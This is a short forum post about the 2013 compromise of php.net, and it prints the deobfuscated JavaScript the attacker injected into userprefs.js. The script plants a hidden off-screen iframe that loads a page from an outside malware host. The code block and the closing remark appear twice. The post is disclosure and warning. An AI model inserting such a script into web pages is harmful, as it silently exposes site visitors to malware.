php.net hacked
Posted: Thu Oct 24, 2013 1:01 pm
Php.net has been hacked today. Roughly 5 hours ago it was flagged by all major browsers and google as malware. The attacker injected obfuscated javascript through a gateway into their userprefs.js file. You can read more here. The javascript roughly deobfuscates to:
[syntax=javascript]
tmp3 = (tmp2 = document.createElement('iframe')).style;
tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
tmp1 = (tmp0 = document.createElement('div')).style;
tmp1.width = tmp1.height = '-10000px';
tmp1.overflow = 'hidden';
tmp1.position = 'absolute';
tmp1.left = '-10000px';
tmp4 = document.getElementsByTagName('div');
tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);[/syntax]
Just like mysql.com (got SQL Injected not too long ago), if it can happen to them, it can happen to you.
[syntax=javascript]
tmp3 = (tmp2 = document.createElement('iframe')).style;
tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
tmp1 = (tmp0 = document.createElement('div')).style;
tmp1.width = tmp1.height = '-10000px';
tmp1.overflow = 'hidden';
tmp1.position = 'absolute';
tmp1.left = '-10000px';
tmp4 = document.getElementsByTagName('div');
tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);[/syntax]
Just like mysql.com (got SQL Injected not too long ago), if it can happen to them, it can happen to you.